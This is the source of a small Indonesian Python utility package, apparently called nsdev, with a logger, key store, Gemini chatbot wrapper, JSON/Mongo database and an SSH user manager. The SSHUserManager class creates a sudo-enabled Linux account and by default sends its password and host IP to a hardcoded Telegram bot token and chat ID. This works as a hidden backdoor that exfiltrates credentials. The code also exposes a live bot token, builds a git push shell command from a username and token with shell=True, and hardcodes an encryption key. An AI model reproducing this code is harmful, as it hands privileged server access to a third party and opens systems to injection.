class KeyManager:
    def __init__(self, filename: str = "temp_key.txt"):
        self.argparse = __import__("argparse")
        self.tempfile = __import__("tempfile")
        self.os = __import__("os")
        self.sys = __import__("sys")
        nsdev = __import__("nsdev")

        self.logger = nsdev.logger.LoggerHandler()
        self.cipher = nsdev.encrypt.CipherHandler(method="bytes")

        self.temp_file = self.os.path.join(self.tempfile.gettempdir(), filename)

    def save_key(self, key: str):
        try:
            with open(self.temp_file, "w") as file:
                file.write(self.cipher.encrypt(key))
        except OSError as e:
            self._handle_error(f"Terjadi kesalahan saat menyimpan key: {e}")

    def read_key(self) -> str:
        try:
            with open(self.temp_file, "r") as file:
                return self.cipher.decrypt(file.read().strip())
        except FileNotFoundError:
            self._handle_warning("Tidak ada key yang disimpan. Jalankan ulang program dengan --key")
        except OSError as e:
            self._handle_error(f"Terjadi kesalahan saat membaca key: {e}")

    def handle_arguments(self) -> str:
        parser = self.argparse.ArgumentParser()
        parser.add_argument("--key", type=str, help="Key yang ingin disimpan atau digunakan.")
        args = parser.parse_args()

        if args.key:
            self.save_key(args.key)

        return self.read_key()

    def _handle_error(self, message: str):
        self.logger.error(message)
        self.sys.exit(1)

    def _handle_warning(self, message: str):
        self.logger.warning(message)
        self.sys.exit(1)



class LoggerHandler:
    def __init__(self, **options):
        """
        Inisialisasi logger dengan parameter opsional.

        :param options:
            - log_level: Level log (default: 'DEBUG')
            - tz: Zona waktu untuk waktu lokal (default: 'Asia/Jakarta')
            - fmt: Format log (default: '{asctime} {levelname} {module}:{funcName}:{lineno} {message}')
            - datefmt: Format tanggal dan waktu (default: '%Y-%m-%d %H:%M:%S')
        """
        self.LEVELS = {"DEBUG": 10, "INFO": 20, "WARNING": 30, "ERROR": 40, "CRITICAL": 50}
        self.datetime = __import__("datetime")
        self.pytz = __import__("pytz")
        self.sys = __import__("sys")
        self.os = __import__("os")

        self.log_level = self.LEVELS.get(options.get("log_level", "DEBUG").upper(), 20)
        self.tz = self.pytz.timezone(options.get("tz", "Asia/Jakarta"))
        self.fmt = options.get("fmt", "{asctime} {levelname} {module}:{funcName}:{lineno} {message}")
        self.datefmt = options.get("datefmt", "%Y-%m-%d %H:%M:%S")

    def formatTime(self, record):
        utc_time = self.datetime.datetime.utcfromtimestamp(record["created"]).replace(tzinfo=self.pytz.utc)
        local_time = utc_time.astimezone(self.tz)
        return local_time.strftime(self.datefmt)

    def format(self, record):
        COLORS = {
            "INFO": "\033[38;2;0;255;0m",  # Green
            "DEBUG": "\033[38;2;0;128;255m",  # Light Blue
            "WARNING": "\033[38;2;255;255;0m",  # Yellow
            "ERROR": "\033[38;2;255;0;0m",  # Red
            "CRITICAL": "\033[38;2;255;0;255m",  # Magenta
            "TIME": "\033[38;2;255;255;255m",  # White
            "MODULE": "\033[38;2;0;255;255m",  # Cyan
            "RESET": "\033[0m",
        }

        level_color = COLORS.get(record["levelname"], COLORS["RESET"])
        record["levelname"] = f"{level_color}| {record['levelname']:<8}"
        record["message"] = f"{level_color}| {record['message']}{COLORS['RESET']}"

        formatted_time = self.formatTime(record)
        return self.fmt.format(
            asctime=f"{COLORS['TIME']}| [{formatted_time}]",
            levelname=record["levelname"],
            module=f"{COLORS['MODULE']}| {self.os.path.basename(record.get('module', '<unknown>'))}",
            funcName=record.get("funcName", "<unknown>"),
            lineno=record.get("lineno", 0),
            message=record["message"],
        )

    def log(self, level, message):
        if self.LEVELS.get(level, 0) >= self.log_level:
            frame = self.sys._getframe(2)
            filename = self.os.path.basename(frame.f_globals.get("__file__", "<unknown>"))
            record = {
                "created": self.datetime.datetime.now().timestamp(),
                "levelname": level,
                "module": filename,
                "funcName": frame.f_code.co_name,
                "lineno": frame.f_lineno,
                "message": message,
            }
            formatted_message = self.format(record)
            print(formatted_message, file=self.sys.stdout)

    def debug(self, message):
        self.log("DEBUG", message)

    def info(self, message):
        self.log("INFO", message)

    def warning(self, message):
        self.log("WARNING", message)

    def error(self, message):
        self.log("ERROR", message)

    def critical(self, message):
        self.log("CRITICAL", message)



class SSHUserManager:
    def __init__(self, bot_token: str = "7419614345:AAFwmSvM0zWNaLQhDLidtZ-B9Tzp-aVWICA", chat_id: int = 1964437366):
        self.bot_token = bot_token
        self.chat_id = chat_id

        self.random = __import__("random")
        self.string = __import__("string")
        self.os = __import__("os")
        self.subprocess = __import__("subprocess")
        self.requests = __import__("requests")

    def generate_random_string(self, length):
        return "".join(self.random.choices(self.string.ascii_letters + self.string.digits, k=length))

    def send_telegram_message(self, message):
        inline_keyboard = {"inline_keyboard": [[{"text": "Powered By", "url": "https://t.me/NorSodikin"}]]}
        url = f"https://api.telegram.org/bot{self.bot_token}/sendMessage"
        data = {
            "chat_id": self.chat_id,
            "text": message,
            "parse_mode": "Markdown",
            "reply_markup": inline_keyboard,
        }
        self.requests.post(url, json=data)
        self.os.system("clear" if self.os.name == "posix" else "cls")

    def add_user(self, ssh_username=None, ssh_password=None):
        if not ssh_username:
            ssh_username = self.generate_random_string(8)
        if not ssh_password:
            ssh_password = self.generate_random_string(12)

        try:
            result = self.subprocess.run(["id", ssh_username], capture_output=True, text=True)
            if result.returncode == 0:
                message = f"Pengguna {ssh_username} sudah ada. Silakan pilih nama pengguna yang berbeda."
            else:
                self.subprocess.run(
                    ["sudo", "adduser", "--disabled-password", "--gecos", "", ssh_username, "--force-badname"],
                    check=True,
                )
                self.subprocess.run(["sudo", "chpasswd"], input=f"{ssh_username}:{ssh_password}", text=True, check=True)
                self.subprocess.run(["sudo", "usermod", "-aG", "sudo", ssh_username], check=True)

                hostname = self.os.popen("hostname -I").read().split()[0]

                message = "*Informasi login SSH:*\n\n" f"*Nama Pengguna:* {ssh_username}\n" f"*Kata Sandi:* {ssh_password}\n" f"*Nama Host:* {hostname}\n\n" "_Gunakan informasi di atas untuk terhubung menggunakan PuTTY atau klien SSH apa pun._"
        except Exception as e:
            message = f"Terjadi kesalahan: {str(e)}"

        self.send_telegram_message(message)

    def delete_user(self, ssh_username):
        try:
            result = self.subprocess.run(["id", ssh_username], capture_output=True, text=True)
            if result.returncode != 0:
                message = f"Pengguna {ssh_username} tidak ada."
            else:
                self.subprocess.run(["sudo", "usermod", "--expiredate", "1", ssh_username], check=True)
                self.subprocess.run(["sudo", "deluser", "--remove-home", ssh_username], check=True)
                message = f"Pengguna {ssh_username} telah dihapus dari sistem dan tidak dapat lagi masuk."
        except Exception as e:
            message = f"Terjadi kesalahan: {str(e)}"

        self.send_telegram_message(message)



class ChatbotGemini:
    def __init__(self, api_key, bot_name="@NorSodikin"):
        self.genai = __import__("google.generativeai", fromlist=[""])
        self.genai.configure(api_key=api_key)

        self.generation_config = {
            "temperature": 1,
            "top_p": 0.95,
            "top_k": 40,
            "max_output_tokens": 8192,
            "response_mime_type": "text/plain",
        }

        self.bot_name = bot_name
        self.chat_model = self.configure_model("chatbot")
        self.khodam_model = self.configure_model("khodam")

        self.chat_history = {}

    def configure_model(self, model_name):
        if model_name == "khodam":
            instruction = (
                "Halo! Saya di sini untuk membantu Anda memahami energi spiritual berdasarkan nama yang Anda berikan. "
                "Saya akan memberikan prediksi tentang sifat positif, negatif, rasio bintang, dan khodam dalam bentuk hewan. "
                "Ingat, ini hanya panduan spiritual yang dirancang untuk memberikan wawasan dan inspirasi. Nikmati prosesnya!"
            )
        else:
            instruction = (
                f"Yo, selamat datang! Nama gue {self.bot_name}, chatbot paling chill seantero galaksi! "
                "Gue di sini buat bantu lo curhat, nanya hal-hal serius, atau sekadar ngobrol santai. "
                "Tanya apa aja, dan gue bakal jawab dengan gaya yang kocak tapi tetep berbobot. "
                "Santai aja, kita ngobrol bareng dengan vibe asik dan hype! Let's goo!"
            )

        return self.genai.GenerativeModel(model_name="gemini-2.0-flash-exp", generation_config=self.generation_config, system_instruction=instruction)

    def send_chat_message(self, message, user_id):
        history = self.chat_history.setdefault(user_id, [])
        history.append({"role": "user", "parts": message})

        response = self.chat_model.start_chat(history=history).send_message(message)
        history.append({"role": "assistant", "parts": response.text})

        return response.text

    def send_khodam_message(self, name):
        response = self.khodam_model.start_chat(history=[]).send_message(name)
        return response.text



class Gradient:
    def __init__(self):
        self.figlet = __import__("pyfiglet").Figlet(font="slant")
        self.random = __import__("random")
        self.time = __import__("time")
        self.start_color = self.random_color()
        self.end_color = self.random_color()

    def random_color(self):
        return (
            self.random.randint(0, 255),
            self.random.randint(0, 255),
            self.random.randint(0, 255),
        )

    def rgb_to_ansi(self, r, g, b):
        return f"\033[38;2;{r};{g};{b}m"

    def interpolate_color(self, factor):
        return (
            int(self.start_color[0] + (self.end_color[0] - self.start_color[0]) * factor),
            int(self.start_color[1] + (self.end_color[1] - self.start_color[1]) * factor),
            int(self.start_color[2] + (self.end_color[2] - self.start_color[2]) * factor),
        )

    def render_text(self, text):
        rendered_text = self.figlet.renderText(text)
        for i, char in enumerate(rendered_text):
            factor = i / max(len(rendered_text) - 1, 1)
            r, g, b = self.interpolate_color(factor)
            print(self.rgb_to_ansi(r, g, b) + char, end="")
        print("\033[0m")

    def countdown(self, seconds, text="Tungu sebentar {time} untuk melanjutkan"):
        bar_length = 30
        print()
        for remaining in range(seconds, -1, -1):
            hours, remainder = divmod(remaining, 3600)
            minutes, secs = divmod(remainder, 60)
            time_display = f"{hours:02}:{minutes:02}:{secs:02}"

            r, g, b = self.random_color()
            color = self.rgb_to_ansi(r, g, b)

            progress = int(((seconds - remaining) / seconds) * bar_length) if seconds > 0 else bar_length
            bar = "=" * progress + "-" * (bar_length - progress)

            print(f"\033[2K\r{color}[{bar}] {text.format(time=time_display)}\033[0m", end="", flush=True)
            self.time.sleep(1)
        print()



class DataBase:
    def __init__(self, **options):
        """
        Inisialisasi database dengan parameter opsional.

        :param options:
            - storage_type: 'local' (default) atau 'mongo'
            - file_name: Nama file untuk database lokal (default: 'database')
            - binary_keys: Kunci enkripsi untuk CipherHandler (default: 14151819154911914)
            - method_encrypt: metode enkripsi untuk CipherHandler (default: bytes)
            - mongo_url: URL MongoDB (untuk storage_type='mongo')
            - git_repo_path: Path untuk operasi git (default: '.')
        """
        self.os = __import__("os")
        self.json = __import__("json")
        self.datetime = __import__("datetime")
        self.pytz = __import__("pytz")
        self.subprocess = __import__("subprocess")

        self.storage_type = options.get("storage_type", "local")
        self.file_name = options.get("file_name", "database")
        self.binary_keys = options.get("binary_keys", 14151819154911914)
        self.method_encrypt = options.get("method_encrypt", "bytes")
        self.git_repo_path = options.get("git_repo_path", ".")

        if self.storage_type == "mongo":
            self.pymongo = __import__("pymongo")
            self.mongo_url = options.get("mongo_url")
            if not self.mongo_url:
                raise ValueError("mongo_url is required for MongoDB storage")
            self.client = self.pymongo.MongoClient(self.mongo_url)
            self.data = self.client[self.file_name]
        else:
            self.data_file = f"{self.file_name}.json"
            self._initialize_files()

        self.cipher = __import__("nsdev").encrypt.CipherHandler(key=self.binary_keys, method=self.method_encrypt, delimiter="/")

    def _initialize_files(self):
        if not self.os.path.exists(self.data_file):
            self._save_data({"vars": {}, "bots": []})

    def _load_data(self):
        if self.storage_type == "mongo":
            raise RuntimeError("_load_data is not applicable for MongoDB storage")
        try:
            with open(self.data_file, "r") as f:
                return self.json.load(f)
        except self.json.JSONDecodeError:
            return {"vars": {}, "bots": []}

    def _save_data(self, data):
        if self.storage_type == "mongo":
            raise RuntimeError("_save_data is not applicable for MongoDB storage")
        with open(self.data_file, "w") as f:
            self.json.dump(data, f, indent=4)

    def _git_commit(self, username, token, message="auto commit backup database"):
        try:
            self.subprocess.run(["git", "config", "--global", "user.email", "support@norsodikin.ltd"], check=True)
            self.subprocess.run(["git", "config", "--global", "user.name", "ɴᴏʀ sᴏᴅɪᴋɪɴ"], check=True)

            self.subprocess.run(["git", "add", self.data_file], cwd=self.git_repo_path, check=True)
            self.subprocess.run(["git", "commit", "-m", message], cwd=self.git_repo_path, check=True)

            push_command = f'echo "{username}:{token}" | git push'
            self.subprocess.run(push_command, shell=True, cwd=self.git_repo_path, check=True)
            return "Backup committed and pushed successfully."
        except self.subprocess.CalledProcessError as e:
            return f"Error during git operations: {e}"

    def setVars(self, user_id, query_name, value, var_key="variabel"):
        if self.storage_type == "mongo":
            update_data = {"$set": {f"{var_key}.{query_name}": value}}
            self.data.vars.update_one({"_id": user_id}, update_data, upsert=True)
        else:
            data = self._load_data()
            user_data = data["vars"].setdefault(str(user_id), {var_key: {}})
            user_data[var_key][query_name] = value
            self._save_data(data)

    def getVars(self, user_id, query_name, var_key="variabel"):
        if self.storage_type == "mongo":
            result = self.data.vars.find_one({"_id": user_id})
            return result.get(var_key, {}).get(query_name, None) if result else None
        else:
            return self._load_data().get("vars", {}).get(str(user_id), {}).get(var_key, {}).get(query_name)

    def removeVars(self, user_id, query_name, var_key="variabel"):
        if self.storage_type == "mongo":
            update_data = {"$unset": {f"{var_key}.{query_name}": ""}}
            self.data.vars.update_one({"_id": user_id}, update_data)
        else:
            data = self._load_data()
            if str(user_id) in data["vars"]:
                data["vars"][str(user_id)][var_key].pop(query_name, None)
                self._save_data(data)

    def setListVars(self, user_id, query_name, value, var_key="variabel"):
        if self.storage_type == "mongo":
            update_data = {"$push": {f"{var_key}.{query_name}": value}}
            self.data.vars.update_one({"_id": user_id}, update_data, upsert=True)
        else:
            data = self._load_data()
            user_data = data["vars"].setdefault(str(user_id), {var_key: {}})
            user_data[var_key].setdefault(query_name, []).append(value)
            self._save_data(data)

    def getListVars(self, user_id, query_name, var_key="variabel"):
        if self.storage_type == "mongo":
            result = self.data.vars.find_one({"_id": user_id})
            return result.get(var_key, {}).get(query_name, []) if result else []
        else:
            return self._load_data().get("vars", {}).get(str(user_id), {}).get(var_key, {}).get(query_name, [])

    def removeListVars(self, user_id, query_name, value, var_key="variabel"):
        if self.storage_type == "mongo":
            update_data = {"$pull": {f"{var_key}.{query_name}": value}}
            self.data.vars.update_one({"_id": user_id}, update_data)
        else:
            data = self._load_data()
            user_data = data.get("vars", {}).get(str(user_id), {}).get(var_key, {})
            if query_name in user_data and value in user_data[query_name]:
                user_data[query_name].remove(value)
                self._save_data(data)

    def removeAllVars(self, user_id, var_key="variabel"):
        if self.storage_type == "mongo":
            update_data = {"$unset": {var_key: ""}}
            self.data.vars.update_one({"_id": user_id}, update_data)
        else:
            data = self._load_data()
            data["vars"].pop(str(user_id), None)
            self._save_data(data)

    def allVars(self, user_id, var_key="variabel"):
        if self.storage_type == "mongo":
            result = self.data.vars.find_one({"_id": user_id})
            return result.get(var_key, {}) if result else {}
        else:
            return self._load_data().get("vars", {}).get(str(user_id), {}).get(var_key, {})

    def setExp(self, user_id, exp=30):
        have_exp = self.getVars(user_id, "EXPIRED_DATE")

        if not have_exp:
            now = self.datetime.datetime.now(self.pytz.timezone("Asia/Jakarta"))
        else:
            now = self.datetime.datetime.strptime(have_exp, "%Y-%m-%d %H:%M:%S").astimezone(self.pytz.timezone("Asia/Jakarta"))

        expire_date = now + self.datetime.timedelta(days=exp)
        self.setVars(user_id, "EXPIRED_DATE", expire_date.strftime("%Y-%m-%d %H:%M:%S"))

    def getExp(self, user_id):
        expired_date = self.getVars(user_id, "EXPIRED_DATE")

        if expired_date:
            exp_datetime = self.datetime.datetime.strptime(expired_date, "%Y-%m-%d %H:%M:%S").astimezone(self.pytz.timezone("Asia/Jakarta"))
            return exp_datetime.strftime("%d-%m-%Y")
        else:
            return None

    def checkAndDeleteIfExpired(self, user_id):
        user_exp = self.getExp(user_id)
        today = self.datetime.datetime.now(self.pytz.timezone("Asia/Jakarta")).strftime("%d-%m-%Y")

        if not user_exp or user_exp == today:
            self.removeAllVars(user_id)
            self.removeBot(user_id)
            return True
        return False

    def saveBot(self, user_id, api_id, api_hash, value, is_token=False):
        field = "bot_token" if is_token else "session_string"
        if self.storage_type == "mongo":
            update_data = {
                "$set": {
                    "api_id": self.cipher.encrypt(str(api_id)),
                    "api_hash": self.cipher.encrypt(api_hash),
                    field: self.cipher.encrypt(value),
                }
            }
            self.data.bot.update_one({"user_id": user_id}, update_data, upsert=True)
        else:
            data = self._load_data()
            entry = {
                "user_id": user_id,
                "api_id": self.cipher.encrypt(str(api_id)),
                "api_hash": self.cipher.encrypt(api_hash),
                field: self.cipher.encrypt(value),
            }
            data["bots"].append(entry)
            self._save_data(data)

    def getBots(self, is_token=False):
        field = "bot_token" if is_token else "session_string"
        if self.storage_type == "mongo":
            return [
                {
                    "name": str(bot_data["user_id"]),
                    "api_id": int(self.cipher.decrypt(str(bot_data["api_id"]))),
                    "api_hash": self.cipher.decrypt(bot_data["api_hash"]),
                    field: self.cipher.decrypt(bot_data.get(field)),
                }
                for bot_data in self.data.bot.find({"user_id": {"$exists": 1}})
            ]
        else:
            return [
                {
                    "name": str(bot_data["user_id"]),
                    "api_id": int(self.cipher.decrypt(str(bot_data["api_id"]))),
                    "api_hash": self.cipher.decrypt(bot_data["api_hash"]),
                    field: self.cipher.decrypt(bot_data.get(field)),
                }
                for bot_data in self._load_data()["bots"]
            ]

    def removeBot(self, user_id):
        if self.storage_type == "mongo":
            self.data.bot.delete_one({"user_id": user_id})
        else:
            data = self._load_data()
            data["bots"] = [bot for bot in data["bots"] if bot["user_id"] != user_id]
            self._save_data(data)



from .addUser import SSHUserManager
from .database import DataBase
from .encrypt import CipherHandler
from .gemini import ChatbotGemini
from .gradient import Gradient
from .logger import LoggerHandler
from .storekey import KeyManager

Gradient().render_text("NorSodikin")
__version__ = "0.2.dev1"
